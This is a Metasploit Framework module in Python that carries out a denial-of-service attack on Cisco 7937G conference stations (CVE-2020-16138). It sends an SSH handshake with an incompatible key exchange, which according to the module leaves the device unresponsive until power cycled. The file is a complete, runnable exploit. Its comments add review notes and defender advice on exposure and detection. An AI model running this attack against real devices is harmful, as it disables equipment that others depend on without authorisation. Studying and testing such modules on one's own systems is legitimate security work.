GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/cisco/cisco_7937g_dos.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# standard modules
from metasploit import module
import logging
import string
import random
# extra modules
# socket is part of the Python standard library, so this guard is not expected
# to fire in practice; the flag is kept because run() checks it before use.
try:
    import socket
except ImportError:
    dependency1_missing = True
else:
    dependency1_missing = False

# paramiko is a third-party package and may be absent from the interpreter
# that executes this module; run() reports the problem instead of crashing.
try:
    import paramiko
except ImportError:
    dependency2_missing = True
else:
    dependency2_missing = False
# Module descriptor; it is passed to module.run() together with run() at the
# bottom of the file.
metadata = {
    'name': 'Cisco 7937G Denial-of-Service Attack',
    # Impact as stated below: the device stays nonresponsive until someone
    # power cycles it, so recovery is manual rather than automatic.
    'description': '''
        This module exploits a bug in how the conference station
        handles incoming SSH connections that provide an incompatible
        key exchange. By connecting with an incompatible key exchange,
        the device becomes nonresponsive until it is manually power
        cycled.
    ''',
    'authors': [
        'Cody Martin'
        # Author Homepage: debifrank.github.io
        # Organization: BlackLanternSecurity
        # Org. Homepage: BlackLanternSecurity.com
    ],
    'date': '2020-06-02',
    'license': 'GPL_LICENSE',
    # The advisory write-up and the CVE identifier to use when tracking
    # exposure of this device model.
    'references': [
        {'type': 'url', 'ref': 'https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/'},
        {'type': 'cve', 'ref': '2020-16138'}
    ],
    'type': 'dos',
    'options': {
        # NOTE(review): the default is the string 'None', not the None
        # object; confirm how the framework treats it for a required option.
        'rhost': {'type': 'address',
                  'description': 'Target address',
                  'required': True,
                  'default': 'None'},
        # run() converts this value with int() and applies it as the socket
        # timeout. The port is not an option: run() always uses 22.
        'timeout': {'type': 'int',
                    'description':
                        'Timeout in seconds',
                    'required': True,
                    'default': 15}
    }
}
# from modules/auxiliary/dos/http/slowloris.py
def create_rand_cred(size, seq=string.ascii_uppercase + string.ascii_lowercase):
    """Return a filler string of ``size`` characters picked from ``seq``.

    Characters are drawn one at a time with ``random.choice``. The ``random``
    module is not a cryptographic generator, so the result is suitable only
    as placeholder text, never as a real secret.

    Args:
        size: number of characters to produce; 0 yields an empty string.
        seq: non-empty sequence of candidate characters (ASCII letters by
            default).

    Returns:
        The concatenated characters as a ``str``.
    """
    picked = []
    for _ in range(size):
        picked.append(random.choice(seq))
    return ''.join(picked)
def run(args):
    """Callback passed to ``module.run()``; performs the module's single action.

    Opens one TCP connection to port 22 of ``args['rhost']`` and starts an SSH
    handshake through paramiko with three Diffie-Hellman SHA-1 key exchange
    algorithms disabled on the client side. According to the module
    description, a Cisco 7937G that receives an incompatible key exchange
    becomes nonresponsive until it is power cycled (CVE-2020-16138).

    Args:
        args: option mapping; this function reads ``args['rhost']`` and
            ``args['timeout']`` (seconds, converted with ``int``).

    Returns:
        None on every path; outcomes are reported through ``logging`` only.

    Defender notes: on the network this is one SSH client connection to the
    device whose key exchange proposal omits the three algorithms listed
    below, followed by a failed handshake. Keeping SSH disabled on the device
    where it is not needed, or reachable only from a management network,
    removes the exposure; unexpected SSH connections to conference stations
    are worth alerting on.
    """
    # Prefix every log line with the configured address.
    module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))
    if dependency1_missing:
        # NOTE(review): socket is part of the standard library, so this branch
        # is not expected to run, and the pip hint below does not apply to it.
        logging.error('Python module dependency (socket) is missing, cannot continue')
        logging.error('Please execute pip3 install socket.')
        return
    if dependency2_missing:
        logging.error('Python module dependency (paramiko) is missing, cannot continue')
        logging.error('Please execute pip3 install paramiko.')
        return

    # Plain IPv4 TCP socket; the timeout covers the connect below.
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(int(args['timeout']))
    try:
        # The port is fixed at 22; there is no module option for it.
        sock.connect((args['rhost'], 22))
    except OSError:
        # Connection refused, timeout or unreachable host all end up here.
        logging.error("Device doesn't appear to be functioning (already DoS'd?) or SSH is not enabled.")
        return

    # The listed key exchange algorithms are removed from what this client
    # offers. Presumably they are the ones the device supports, which would
    # make the negotiation incompatible; confirm against the advisory.
    transport = paramiko.Transport(sock=sock, disabled_algorithms={"kex": ["diffie-hellman-group-exchange-sha1",
                                                                           "diffie-hellman-group14-sha1",
                                                                           "diffie-hellman-group1-sha1"]})
    # Random 7-10 letter filler values; the handshake is expected to fail
    # before they matter.
    ssh_uname = create_rand_cred(random.randint(7, 10))
    ssh_pass = create_rand_cred(random.randint(7, 10))
    try:
        transport.connect(username=ssh_uname, password=ssh_pass)
    # paramiko.SSHException and paramiko.ssh_exception.SSHException are the
    # same class, so the tuple is effectively (SSHException, OSError).
    except (paramiko.ssh_exception.SSHException, OSError, paramiko.SSHException):
        # NOTE(review): these messages are logged for any SSH or socket
        # failure, including an ordinary authentication rejection (paramiko's
        # AuthenticationException derives from SSHException). The log line is
        # therefore not confirmation of the device's state.
        logging.info("DoS non-reset attack completed!")
        logging.info("Errors are intended.")
        logging.info("Device must be power cycled to restore functionality.")
        return

    # Reached only if the connect call returned without raising; nothing is
    # logged in that case.
    # NOTE(review): sock and transport are never closed on any path; they are
    # released only when the process exits.
    return
# Hand the descriptor and the run() callback to the metasploit `module` helper
# only when this file is executed as a script, not when it is imported.
if __name__ == '__main__':
    module.run(metadata, run)